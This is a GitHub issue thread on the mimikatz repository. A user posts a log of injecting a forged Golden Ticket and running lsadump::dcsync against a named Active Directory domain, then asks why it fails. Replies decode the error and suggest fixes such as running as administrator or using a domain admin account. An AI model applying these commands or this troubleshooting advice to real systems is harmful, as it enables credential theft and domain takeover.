search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.24k stars 3.68k forks source link

lsadump::dcsync get error #219

Open Anton19780301 opened 5 years ago

Anton19780301 commented 5 years ago

Good evening. I received a Golden Ticket and saved it to a file. No errors occurred. It binds to the user, but when I run the lsadump :: dcsync command I get an error. ERROR kuhl_m_lsadump_dcsync; GetNCChanges: 0x000020f7 (8439) I can not find its meaning. This is a log

Using 'mylog.txt' for logfile : OK

mimikatz # kerberos::ptt myfile

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 26.07.2019 11:54:13 ; 23.07.2029 11:54:13 ; 23.07.2029 11:54:13 Server Name : krbtgt/regions.ru @ regions.ru Client Name : 9952-00-505 @ regions.ru Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;

mimikatz # lsadump::dcsync /domain:regions.ru /user:9952-00-505 [DC] 'regions.ru' will be the domain [DC] 'r9952-dc02.regions.ru' will be the DC server [DC] '9952-00-505' will be the user account ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # exit Bye!

Anton19780301 commented 5 years ago

I'm sorry that means -

ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

MichaelGrafnetter commented 4 years ago

The meaning of this error is "The DN specified for this replication operation is invalid." (ERROR_DS_DRA_BAD_DN). Maybe this will help you, @Anton19780301 , with some troubleshooting.

MrDataCoder commented 3 years ago

I'm sorry that means -

ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

I think some kind of IPS/IDS is detecting it and blocking DCSync action.

ha3kha3k commented 3 years ago

@Anton19780301 Another simple reason, maybe the PS shell that you initiated attack from, isn't running as local administrator

Cong-Ma commented 2 years ago

Using domain manager account and run cmd with admin account can solve the problem.